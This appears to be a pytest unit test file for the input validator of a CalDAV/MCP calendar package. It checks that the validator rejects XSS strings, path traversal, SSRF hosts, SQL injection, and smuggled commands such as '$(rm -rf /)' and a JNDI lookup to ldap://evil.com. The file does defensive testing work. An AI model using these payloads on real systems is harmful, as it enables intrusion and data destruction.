iflow-mcp_democratize-technology-chronos-mcp 2.0.0__py3-none-any.whl

tests/unit/test_validation.py

@@ -0,0 +1,983 @@
+"""
+Unit tests for input validation
+"""
+
+from datetime import datetime
+import ipaddress
+import socket
+from unittest.mock import patch
+
+import pytest
+
+from chronos_mcp.exceptions import ValidationError
+from chronos_mcp.models import TaskStatus
+from chronos_mcp.validation import InputValidator
+
+
+class TestTextFieldValidation:
+    def test_validate_text_field_success(self):
+        """Test successful text field validation"""
+        result = InputValidator.validate_text_field("Test Event", "summary")
+        assert result == "Test Event"
+
+        # Test with HTML entities (should NOT be escaped at storage layer)
+        result = InputValidator.validate_text_field("Meeting & Discussion", "summary")
+        assert result == "Meeting & Discussion"  # No escaping at storage
+
+    def test_validate_text_field_required(self):
+        """Test required field validation"""
+        # Required field with empty value
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field("", "summary", required=True)
+        assert "summary is required" in str(exc_info.value)
+
+        # Optional field with empty value
+        result = InputValidator.validate_text_field("", "description", required=False)
+        assert result == ""
+
+    def test_validate_text_field_length(self):
+        """Test field length validation"""
+        # Exceed max length
+        long_text = "A" * 300
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(long_text, "summary")
+        assert "exceeds maximum length" in str(exc_info.value)
+
+    def test_dangerous_patterns_detection(self):
+        """Test detection of dangerous patterns"""
+        dangerous_inputs = [
+            "<script>alert('xss')</script>",
+            "<a href='javascript:void(0)'>",
+            "<div onclick='bad()'>",
+            "<script src='bad.js'></script>",
+            "<iframe src='evil.com'>",
+            "<object data='bad'>",
+            "<embed code='evil'>",
+        ]
+
+        for dangerous_input in dangerous_inputs:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_text_field(dangerous_input, "description")
+            assert "potentially dangerous content" in str(exc_info.value)
+
+    def test_unicode_normalization(self):
+        """Test Unicode normalization"""
+        # Unicode with different representations
+        text_nfc = "café"  # NFC form
+        text_nfd = "café"  # NFD form (e + combining acute)
+
+        result1 = InputValidator.validate_text_field(text_nfc, "summary")
+        result2 = InputValidator.validate_text_field(text_nfd, "summary")
+
+        # Both should normalize to the same form
+        assert result1 == result2
+
+
+class TestDateTimeValidation:
+    def test_validate_datetime_success(self):
+        """Test successful datetime validation"""
+        # Already a datetime object
+        dt = datetime.now()
+        result = InputValidator.validate_datetime(dt, "dtstart")
+        assert result == dt
+
+        # ISO format string
+        iso_str = "2025-07-10T10:00:00"
+        result = InputValidator.validate_datetime(iso_str, "dtstart")
+        assert isinstance(result, datetime)
+
+        # ISO format with Z suffix
+        iso_z = "2025-07-10T10:00:00Z"
+        result = InputValidator.validate_datetime(iso_z, "dtstart")
+        assert isinstance(result, datetime)
+
+    def test_validate_datetime_failure(self):
+        """Test datetime validation failures"""
+        # Invalid format
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_datetime("not a date", "dtstart")
+        assert "Invalid datetime format" in str(exc_info.value)
+
+        # Wrong type
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_datetime(12345, "dtstart")
+        assert "must be a datetime or ISO format string" in str(exc_info.value)
+
+
+class TestUIDValidation:
+    def test_validate_uid_success(self):
+        """Test successful UID validation"""
+        valid_uids = [
+            "event-123",
+            "abc_def",
+            "test.uid",
+            "user@example.com",
+            "UID-2025-07-10",
+        ]
+
+        for uid in valid_uids:
+            result = InputValidator.validate_uid(uid)
+            assert result == uid
+
+    def test_validate_uid_failure(self):
+        """Test UID validation failures"""
+        # Empty UID
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("")
+        assert "UID cannot be empty" in str(exc_info.value)
+
+        # Invalid characters
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("uid with spaces")
+        assert "invalid characters" in str(exc_info.value)
+
+        # Path traversal attempt
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("../../../etc/passwd")
+        # This will fail the regex check first, not the path check
+        assert "invalid characters" in str(exc_info.value)
+
+        # Too long
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("a" * 300)
+        assert "exceeds maximum length" in str(exc_info.value)
+
+
+class TestEmailValidation:
+    def test_validate_email_success(self):
+        """Test successful email validation"""
+        valid_emails = [
+            "user@example.com",
+            "test.user@domain.co.uk",
+            "name+tag@example.org",
+            "admin123@test-domain.com",
+        ]
+
+        for email in valid_emails:
+            result = InputValidator.validate_email(email)
+            assert result == email.lower()  # Should be lowercased
+
+    def test_validate_email_failure(self):
+        """Test email validation failures"""
+        invalid_emails = [
+            "not-an-email",
+            "@example.com",
+            "user@",
+            "user@@example.com",
+            "user@.com",
+            "a" * 250 + "@example.com",  # Too long
+        ]
+
+        for email in invalid_emails:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_email(email)
+
+
+class TestEventValidation:
+    def test_validate_event_success(self):
+        """Test successful event validation"""
+        event_data = {
+            "summary": "Team Meeting",
+            "dtstart": "2025-07-10T10:00:00",
+            "dtend": "2025-07-10T11:00:00",
+            "description": "Weekly sync",
+            "location": "Conference Room",
+        }
+
+        result = InputValidator.validate_event(event_data)
+
+        assert result["summary"] == "Team Meeting"
+        assert isinstance(result["dtstart"], datetime)
+        assert isinstance(result["dtend"], datetime)
+        assert result["description"] == "Weekly sync"
+        assert result["location"] == "Conference Room"
+
+    def test_validate_event_missing_required(self):
+        """Test event validation with missing required fields"""
+        # Missing summary
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_event(
+                {"dtstart": "2025-07-10T10:00:00", "dtend": "2025-07-10T11:00:00"}
+            )
+        assert "summary is required" in str(exc_info.value)
+
+        # Missing dates
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_event({"summary": "Test"})
+        assert "start time is required" in str(exc_info.value)
+
+    def test_validate_event_date_logic(self):
+        """Test event date validation logic"""
+        # End before start
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_event(
+                {
+                    "summary": "Test",
+                    "dtstart": "2025-07-10T11:00:00",
+                    "dtend": "2025-07-10T10:00:00",
+                }
+            )
+        assert "end time must be after start time" in str(exc_info.value)
+
+
+class TestAttendeeValidation:
+    def test_validate_attendees_success(self):
+        """Test successful attendee validation"""
+        attendees = [
+            {
+                "email": "user1@example.com",
+                "name": "User One",
+                "role": "REQ-PARTICIPANT",
+                "status": "ACCEPTED",
+                "rsvp": True,
+            },
+            {"email": "user2@example.com"},  # Minimal attendee
+        ]
+
+        result = InputValidator.validate_attendees(attendees)
+
+        assert len(result) == 2
+        assert result[0]["email"] == "user1@example.com"
+        assert result[0]["role"] == "REQ-PARTICIPANT"
+        assert result[1]["email"] == "user2@example.com"
+
+    def test_validate_attendees_failure(self):
+        """Test attendee validation failures"""
+        # Not a list
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_attendees("not a list")
+        assert "must be a list" in str(exc_info.value)
+
+        # Missing email
+        with pytest.raises(ValidationError):
+            InputValidator.validate_attendees([{"name": "No Email"}])
+
+        # Invalid role
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_attendees(
+                [{"email": "test@example.com", "role": "INVALID-ROLE"}]
+            )
+        assert "Invalid attendee role" in str(exc_info.value)
+
+
+class TestRRULEValidation:
+    def test_validate_rrule_success(self):
+        """Test successful RRULE validation"""
+        valid_rules = [
+            "FREQ=DAILY",
+            "FREQ=WEEKLY;BYDAY=MO,WE,FR",
+            "FREQ=MONTHLY;BYMONTHDAY=15",
+            "FREQ=YEARLY;BYMONTH=12;BYMONTHDAY=25",
+        ]
+
+        for rule in valid_rules:
+            result = InputValidator.validate_rrule(rule)
+            assert result == rule.upper()
+
+    def test_validate_rrule_failure(self):
+        """Test RRULE validation failures"""
+        # Must start with FREQ
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_rrule("BYDAY=MO")
+        assert "must start with FREQ=" in str(exc_info.value)
+
+        # Invalid frequency
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_rrule("FREQ=HOURLY")
+        assert "Invalid frequency" in str(exc_info.value)
+
+        # Too long
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_rrule("FREQ=DAILY;" + "X=Y;" * 200)
+        assert "too complex" in str(exc_info.value)
+
+
+class TestTaskValidation:
+    """Test task validation functionality"""
+
+    def test_validate_task_success(self):
+        """Test successful task validation"""
+        task_data = {
+            "summary": "Complete project",
+            "description": "Finish the validation improvements",
+            "due": "2025-12-31T23:59:59",
+            "priority": 5,
+            "status": "NEEDS-ACTION",
+            "percent_complete": 25,
+            "uid": "task-123",
+            "related_to": ["parent-task-456"],
+        }
+
+        result = InputValidator.validate_task(task_data)
+
+        assert result["summary"] == "Complete project"
+        assert result["description"] == "Finish the validation improvements"
+        assert isinstance(result["due"], datetime)
+        assert result["priority"] == 5
+        assert result["status"] == TaskStatus.NEEDS_ACTION
+        assert result["percent_complete"] == 25
+        assert result["uid"] == "task-123"
+        assert result["related_to"] == ["parent-task-456"]
+
+    def test_validate_task_minimal(self):
+        """Test task validation with only required fields"""
+        task_data = {"summary": "Simple task"}
+
+        result = InputValidator.validate_task(task_data)
+        assert result["summary"] == "Simple task"
+        assert len(result) == 1  # Only summary should be present
+
+    def test_validate_task_missing_summary(self):
+        """Test task validation with missing summary"""
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_task({})
+        assert "summary is required" in str(exc_info.value)
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_task({"summary": ""})
+        assert "summary is required" in str(exc_info.value)
+
+    def test_validate_task_optional_fields_none(self):
+        """Test task validation with None values for optional fields"""
+        task_data = {
+            "summary": "Task with nulls",
+            "due": None,
+            "priority": None,
+            "status": None,
+            "percent_complete": None,
+        }
+
+        result = InputValidator.validate_task(task_data)
+        assert result["summary"] == "Task with nulls"
+        # None values should not be included in result
+        assert "due" not in result
+        assert "priority" not in result
+        assert "status" not in result
+        assert "percent_complete" not in result
+
+
+class TestPriorityValidation:
+    """Test priority validation"""
+
+    def test_validate_priority_success(self):
+        """Test valid priority values (1-9)"""
+        for priority in range(1, 10):
+            result = InputValidator.validate_priority(priority)
+            assert result == priority
+
+        # Test string numbers
+        result = InputValidator.validate_priority("5")
+        assert result == 5
+
+    def test_validate_priority_boundary_failures(self):
+        """Test priority validation boundary conditions"""
+        # Below minimum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_priority(0)
+        assert "between 1-9" in str(exc_info.value)
+
+        # Above maximum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_priority(10)
+        assert "between 1-9" in str(exc_info.value)
+
+        # Negative values
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_priority(-1)
+        assert "between 1-9" in str(exc_info.value)
+
+    def test_validate_priority_type_errors(self):
+        """Test priority validation with invalid types"""
+        invalid_priorities = ["not-a-number", None, [], {}, "1.5"]
+
+        for invalid in invalid_priorities:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_priority(invalid)
+            assert "must be an integer" in str(exc_info.value)
+
+        # Test float separately - int(3.14) succeeds but gives wrong value
+        # This tests that float conversion works, which is Python's default behavior
+        result = InputValidator.validate_priority(3.14)
+        assert result == 3  # float gets truncated to int
+
+
+class TestTaskStatusValidation:
+    """Test task status validation"""
+
+    def test_validate_task_status_success(self):
+        """Test valid task status values"""
+        valid_statuses = [
+            TaskStatus.NEEDS_ACTION,
+            TaskStatus.IN_PROCESS,
+            TaskStatus.COMPLETED,
+            TaskStatus.CANCELLED,
+        ]
+
+        for status in valid_statuses:
+            result = InputValidator.validate_task_status(status)
+            assert result == status
+
+        # Test string values
+        result = InputValidator.validate_task_status("NEEDS-ACTION")
+        assert result == TaskStatus.NEEDS_ACTION
+
+        result = InputValidator.validate_task_status("COMPLETED")
+        assert result == TaskStatus.COMPLETED
+
+    def test_validate_task_status_failure(self):
+        """Test task status validation failures"""
+        invalid_statuses = [
+            "INVALID-STATUS",
+            "needs-action",  # Wrong case
+            "PENDING",
+            "ACTIVE",
+            123,
+            None,
+        ]
+
+        for invalid in invalid_statuses:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_task_status(invalid)
+            assert "Invalid task status" in str(exc_info.value)
+
+
+class TestPercentCompleteValidation:
+    """Test percent complete validation"""
+
+    def test_validate_percent_complete_success(self):
+        """Test valid percent complete values (0-100)"""
+        for percent in range(0, 101):
+            result = InputValidator.validate_percent_complete(percent)
+            assert result == percent
+
+        # Test string numbers
+        result = InputValidator.validate_percent_complete("50")
+        assert result == 50
+
+        result = InputValidator.validate_percent_complete("0")
+        assert result == 0
+
+        result = InputValidator.validate_percent_complete("100")
+        assert result == 100
+
+    def test_validate_percent_complete_boundary_failures(self):
+        """Test percent complete boundary conditions"""
+        # Below minimum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_percent_complete(-1)
+        assert "between 0-100" in str(exc_info.value)
+
+        # Above maximum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_percent_complete(101)
+        assert "between 0-100" in str(exc_info.value)
+
+        # Large values
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_percent_complete(999)
+        assert "between 0-100" in str(exc_info.value)
+
+    def test_validate_percent_complete_type_errors(self):
+        """Test percent complete validation with invalid types"""
+        invalid_percents = ["not-a-number", None, [], {}, "50.5"]
+
+        for invalid in invalid_percents:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_percent_complete(invalid)
+            assert "must be an integer" in str(exc_info.value)
+
+        # Test float separately - int(3.14) succeeds but truncates
+        result = InputValidator.validate_percent_complete(75.8)
+        assert result == 75  # float gets truncated to int
+
+
+class TestJournalValidation:
+    """Test journal validation functionality"""
+
+    def test_validate_journal_success(self):
+        """Test successful journal validation"""
+        journal_data = {
+            "summary": "Meeting notes",
+            "description": "Discussed project timeline and deliverables",
+            "dtstart": "2025-07-10T14:30:00",
+            "categories": ["work", "meeting", "project"],
+            "uid": "journal-789",
+            "related_to": ["event-123", "task-456"],
+        }
+
+        result = InputValidator.validate_journal(journal_data)
+
+        assert result["summary"] == "Meeting notes"
+        assert result["description"] == "Discussed project timeline and deliverables"
+        assert isinstance(result["dtstart"], datetime)
+        assert result["categories"] == ["work", "meeting", "project"]
+        assert result["uid"] == "journal-789"
+        assert result["related_to"] == ["event-123", "task-456"]
+
+    def test_validate_journal_minimal(self):
+        """Test journal validation with only required fields"""
+        journal_data = {"summary": "Simple note"}
+
+        result = InputValidator.validate_journal(journal_data)
+        assert result["summary"] == "Simple note"
+        assert len(result) == 1
+
+    def test_validate_journal_missing_summary(self):
+        """Test journal validation with missing summary"""
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_journal({})
+        assert "summary is required" in str(exc_info.value)
+
+    def test_validate_journal_optional_fields_none(self):
+        """Test journal validation with None values"""
+        journal_data = {"summary": "Journal with nulls", "dtstart": None}
+
+        result = InputValidator.validate_journal(journal_data)
+        assert result["summary"] == "Journal with nulls"
+        assert "dtstart" not in result
+
+
+class TestCategoriesValidation:
+    """Test categories validation"""
+
+    def test_validate_categories_success(self):
+        """Test successful categories validation"""
+        # List of categories
+        categories = ["work", "meeting", "important"]
+        result = InputValidator.validate_categories(categories)
+        assert result == categories
+
+        # Single category as string
+        result = InputValidator.validate_categories("personal")
+        assert result == ["personal"]
+
+        # Empty list
+        result = InputValidator.validate_categories([])
+        assert result == []
+
+    def test_validate_categories_filtering(self):
+        """Test categories validation with empty strings"""
+        categories = ["work", "", "meeting", "   ", "project"]
+        result = InputValidator.validate_categories(categories)
+        # Empty and whitespace-only categories should be filtered out
+        assert "work" in result
+        assert "meeting" in result
+        assert "project" in result
+        assert "" not in result
+        assert "   " not in result
+
+    def test_validate_categories_failure(self):
+        """Test categories validation failures"""
+        # Invalid types
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_categories(123)
+        assert "must be a list or string" in str(exc_info.value)
+
+        # Non-string items in list
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_categories(["work", 123, "meeting"])
+        assert "must be a string" in str(exc_info.value)
+
+    def test_validate_categories_dangerous_content(self):
+        """Test categories validation with dangerous content"""
+        dangerous_categories = [
+            "<script>alert('xss')</script>",
+            "javascript:void(0)",
+            "work<iframe>evil</iframe>",
+        ]
+
+        for dangerous in dangerous_categories:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_categories([dangerous])
+            assert "potentially dangerous content" in str(exc_info.value)
+
+
+class TestRelatedToValidation:
+    """Test RELATED-TO validation"""
+
+    def test_validate_related_to_success(self):
+        """Test successful RELATED-TO validation"""
+        # List of UIDs
+        uids = ["task-123", "event-456", "journal-789"]
+        result = InputValidator.validate_related_to(uids)
+        assert result == uids
+
+        # Single UID as string
+        result = InputValidator.validate_related_to("single-uid")
+        assert result == ["single-uid"]
+
+        # Empty list
+        result = InputValidator.validate_related_to([])
+        assert result == []
+
+    def test_validate_related_to_failure(self):
+        """Test RELATED-TO validation failures"""
+        # Invalid types
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_related_to(123)
+        assert "must be a list or string" in str(exc_info.value)
+
+        # Non-string items in list
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_related_to(["valid-uid", 123])
+        assert "must be a string" in str(exc_info.value)
+
+        # Invalid UID format
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_related_to(["invalid uid with spaces"])
+        assert "invalid characters" in str(exc_info.value)
+
+
+class TestURLValidation:
+    """Test URL validation with SSRF protection"""
+
+    def test_validate_url_success(self):
+        """Test successful URL validation"""
+        valid_urls = [
+            "https://example.com",
+            "https://calendar.example.org/cal",
+            "https://test-server.co.uk:8443/calendar",
+            "https://sub.domain.example.com/path/to/calendar",
+        ]
+
+        for url in valid_urls:
+            # Mock DNS resolution to return a public IP
+            with patch("socket.getaddrinfo") as mock_dns:
+                mock_dns.return_value = [("", "", "", "", ("8.8.8.8", 0))]
+                result = InputValidator.validate_url(url)
+                assert result == url
+
+    def test_validate_url_with_private_ips_allowed(self):
+        """Test URL validation with private IPs explicitly allowed"""
+        private_urls = [
+            "https://localhost:8080/cal",
+            "https://192.168.1.100/calendar",
+            "https://10.0.0.5:9000/cal",
+        ]
+
+        for url in private_urls:
+            result = InputValidator.validate_url(url, allow_private_ips=True)
+            assert result == url
+
+    def test_validate_url_format_failures(self):
+        """Test URL format validation failures"""
+        invalid_urls = [
+            "",  # Empty
+            "http://example.com",  # HTTP not allowed
+            "ftp://example.com",  # Wrong protocol
+            "not-a-url",
+            "javascript:alert('xss')",
+            "https://",  # Missing domain
+            "https://" + "a" * 2050,  # Too long
+        ]
+
+        for invalid_url in invalid_urls:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_url(invalid_url)
+            error_msg = str(exc_info.value)
+            assert any(
+                phrase in error_msg
+                for phrase in [
+                    "cannot be empty",
+                    "Invalid URL format",
+                    "exceeds maximum length",
+                ]
+            )
+
+    def test_validate_url_ssrf_protection_blocked_hostnames(self):
+        """Test SSRF protection blocks dangerous hostnames"""
+        blocked_urls = [
+            "https://localhost/calendar",
+            "https://localhost.localdomain/cal",
+            "https://127.0.0.1:8080/calendar",
+            "https://0.0.0.0/cal",
+        ]
+
+        for blocked_url in blocked_urls:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_url(blocked_url)
+            assert "localhost and loopback addresses are not allowed" in str(
+                exc_info.value
+            )
+
+    @patch("socket.getaddrinfo")
+    def test_validate_url_ssrf_protection_private_ip_resolution(self, mock_dns):
+        """Test SSRF protection blocks URLs resolving to private IPs"""
+        private_ips = [
+            ("10.0.0.1", 0),  # Class A private
+            ("172.16.0.1", 0),  # Class B private
+            ("192.168.1.1", 0),  # Class C private
+            ("127.0.0.1", 0),  # Loopback
+            ("169.254.1.1", 0),  # Link-local
+        ]
+
+        for ip, port in private_ips:
+            mock_dns.return_value = [("", "", "", "", (ip, port))]
+
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_url("https://external-domain.com")
+
+            error_msg = str(exc_info.value)
+            assert any(
+                phrase in error_msg
+                for phrase in [
+                    "resolves to a private or internal IP",
+                    "resolves to a restricted IP address",
+                ]
+            )
+
+    @patch("socket.getaddrinfo")
+    def test_validate_url_dns_resolution_failure(self, mock_dns):
+        """Test URL validation with DNS resolution failures"""
+        # Simulate DNS resolution failure
+        mock_dns.side_effect = socket.gaierror("Name resolution failed")
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_url("https://non-existent-domain.example")
+
+        assert "Unable to resolve hostname" in str(exc_info.value)
+
+    def test_validate_url_malformed_hostname(self):
+        """Test URL validation with malformed hostnames"""
+        malformed_urls = [
+            "https://./calendar",
+            "https://../calendar",
+            "https://example..com/cal",
+        ]
+
+        for url in malformed_urls:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_url(url)
+
+
+class TestPrivateIPCheck:
+    """Test private IP address checking utility"""
+
+    def test_is_private_ip_private_ranges(self):
+        """Test detection of private IP ranges"""
+        private_ips = [
+            "10.0.0.1",  # Class A private
+            "172.16.0.1",  # Class B private
+            "192.168.1.1",  # Class C private
+            "127.0.0.1",  # Loopback
+            "169.254.1.1",  # Link-local
+            "::1",  # IPv6 loopback
+            "fe80::1",  # IPv6 link-local
+            "fc00::1",  # IPv6 private
+        ]
+
+        for ip in private_ips:
+            assert InputValidator.is_private_ip(ip) is True
+
+    def test_is_private_ip_public_ranges(self):
+        """Test detection of public IP ranges"""
+        public_ips = [
+            "8.8.8.8",  # Google DNS
+            "1.1.1.1",  # Cloudflare DNS
+            "208.67.222.222",  # OpenDNS
+        ]
+
+        for ip in public_ips:
+            assert InputValidator.is_private_ip(ip) is False
+
+        # Note: 203.0.113.1 is actually in TEST-NET-3 range and considered private
+        # 2001:db8::1 is IPv6 documentation range and also considered private
+
+    def test_is_private_ip_invalid_format(self):
+        """Test private IP check with invalid IP formats"""
+        invalid_ips = [
+            "not-an-ip",
+            "999.999.999.999",
+            "192.168.1",  # Incomplete
+            "",
+            "192.168.1.1.1",  # Too many octets
+        ]
+
+        for invalid_ip in invalid_ips:
+            # Invalid IPs should be considered suspicious (return True)
+            assert InputValidator.is_private_ip(invalid_ip) is True
+
+
+class TestSecurityEdgeCases:
+    """Test enhanced security edge cases and encoding bypasses"""
+
+    def test_dangerous_patterns_encoding_bypasses(self):
+        """Test detection of encoded dangerous patterns"""
+        # URL encoded patterns
+        encoded_dangerous = [
+            "<script>alert('xss')</script>",  # Already tested, but important
+            "%3Cscript%3Ealert('xss')%3C/script%3E",  # URL encoded
+            "&#60;script&#62;alert('xss')&#60;/script&#62;",  # HTML entities
+            "\\u003cscript\\u003ealert('xss')\\u003c/script\\u003e",  # Unicode escapes
+        ]
+
+        for dangerous in encoded_dangerous:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_text_field(dangerous, "description")
+            assert "potentially dangerous content" in str(exc_info.value)
+
+    def test_extremely_long_input_protection(self):
+        """Test protection against extremely long inputs (ReDoS protection)"""
+        # Test the pre-filter protection
+        extremely_long = "A" * (InputValidator.MAX_VALIDATION_LENGTH + 1)
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(extremely_long, "description")
+        assert "exceeds maximum validation length" in str(exc_info.value)
+
+    def test_malformed_datetime_edge_cases(self):
+        """Test malformed datetime scenarios that could cause issues"""
+        malformed_dates = [
+            "not-a-date-at-all",
+            "2025/07/10 10:00:00",  # Wrong separator
+            "10:00:00",  # Missing date
+            "2025-07-10T",  # Incomplete
+        ]
+
+        for malformed in malformed_dates:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_datetime(malformed, "dtstart")
+            assert "Invalid datetime format" in str(exc_info.value)
+
+        # Some dates that look invalid but Python accepts with fromisoformat
+        # These are edge cases but Python handles them
+        accepted_dates = [
+            "2025-07-10",  # Missing time - Python accepts this
+            "2025-07-10T10:00",  # Missing seconds - Python accepts this
+        ]
+        for date_str in accepted_dates:
+            # These should work without raising an error
+            result = InputValidator.validate_datetime(date_str, "dtstart")
+            assert isinstance(result, datetime)
+
+    def test_injection_attempts_in_various_fields(self):
+        """Test SQL/command injection attempts in various fields"""
+        # Focus on control characters which are reliably caught
+        control_char_injections = [
+            "\x00\x01\x02",  # Null bytes and control chars
+            "\x1f\x7f",  # More control chars
+        ]
+
+        for injection in control_char_injections:
+            # Test in different field types
+            with pytest.raises(ValidationError):
+                InputValidator.validate_text_field(injection, "summary")
+
+        # Test UID-specific injections (these fail UID pattern matching)
+        uid_injections = [
+            "'; DROP TABLE events; --",  # Contains semicolon and spaces
+            "$(rm -rf /)",  # Contains special chars
+            "`whoami`",  # Contains backticks
+            "${jndi:ldap://evil.com/a}",  # Contains special chars
+        ]
+
+        for injection in uid_injections:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_uid(injection)
+
+        # Test categories with dangerous HTML/script patterns
+        script_injections = [
+            "<script>alert('xss')</script>",
+            "javascript:void(0)",
+        ]
+
+        for injection in script_injections:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_categories([injection])
+
+    def test_unicode_normalization_security(self):
+        """Test Unicode normalization doesn't introduce security issues"""
+        # Test that normalization doesn't create dangerous patterns
+        tricky_unicode = "\\u003cscript\\u003e"  # Unicode for <script>
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(tricky_unicode, "description")
+        assert "potentially dangerous content" in str(exc_info.value)
+
+    def test_field_length_boundaries(self):
+        """Test field length validation at exact boundaries"""
+        # Test summary at exact limit
+        max_summary = "A" * InputValidator.MAX_LENGTHS["summary"]
+        result = InputValidator.validate_text_field(max_summary, "summary")
+        assert len(result) == InputValidator.MAX_LENGTHS["summary"]
+
+        # Test one character over limit
+        over_limit_summary = "A" * (InputValidator.MAX_LENGTHS["summary"] + 1)
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(over_limit_summary, "summary")
+        assert "exceeds maximum length" in str(exc_info.value)
+
+
+class TestMalformedDataScenarios:
+    """Test scenarios with malformed data that could corrupt CalDAV servers"""
+
+    def test_malformed_event_data_combinations(self):
+        """Test malformed event data that could cause server issues"""
+        malformed_events = [
+            # Dates in wrong order (this is already tested but critical)
+            {
+                "summary": "Bad Event",
+                "dtstart": "2025-07-10T11:00:00",
+                "dtend": "2025-07-10T10:00:00",  # End before start
+            },
+            # Missing critical fields
+            {"description": "Event without summary or dates"},
+        ]
+
+        for malformed_event in malformed_events:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_event(malformed_event)
+
+        # Note: Extreme dates (1900, 3000) are actually valid in Python datetime
+        # and don't violate our validation rules - CalDAV servers should handle them
+
+    def test_malformed_task_data_combinations(self):
+        """Test malformed task data scenarios"""
+        # Test individual validation failures (these will definitely fail)
+        with pytest.raises(ValidationError):
+            InputValidator.validate_task(
+                {
+                    "summary": "Bad Task",
+                    "priority": 999,  # Invalid priority (>9)
+                }
+            )
+
+        with pytest.raises(ValidationError):
+            InputValidator.validate_task(
+                {
+                    "summary": "Bad Task",
+                    "percent_complete": 150,  # Invalid percentage (>100)
+                }
+            )
+
+        # Note: Business logic conflicts (like COMPLETED with 50% complete)
+        # are not validated at the input validation layer - that's handled
+        # at the business logic layer
+
+    def test_circular_related_to_references(self):
+        """Test detection of potential circular references in RELATED-TO"""
+        # While we can't detect circular refs at validation level,
+        # we should ensure the UIDs themselves are valid
+        circular_refs = [
+            "task-1",  # Valid UID format
+            "task-1",  # Duplicate - this should be handled at business logic level
+        ]
+
+        # Should validate individual UIDs successfully
+        result = InputValidator.validate_related_to(circular_refs)
+        assert len(result) == 2
+        assert all(uid == "task-1" for uid in result)
+
+    def test_deeply_nested_dangerous_content(self):
+        """Test deeply nested or complex dangerous content"""
+        nested_dangerous = [
+            "<div><span><script>alert('deep')</script></span></div>",
+            "<!-- <script>alert('commented')</script> -->",
+            "<<script>alert('nested')<</script>>",
+            "&lt;script&gt;alert('entity')&lt;/script&gt;",
+        ]
+
+        for dangerous in nested_dangerous:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_text_field(dangerous, "description")
+            assert "potentially dangerous content" in str(exc_info.value)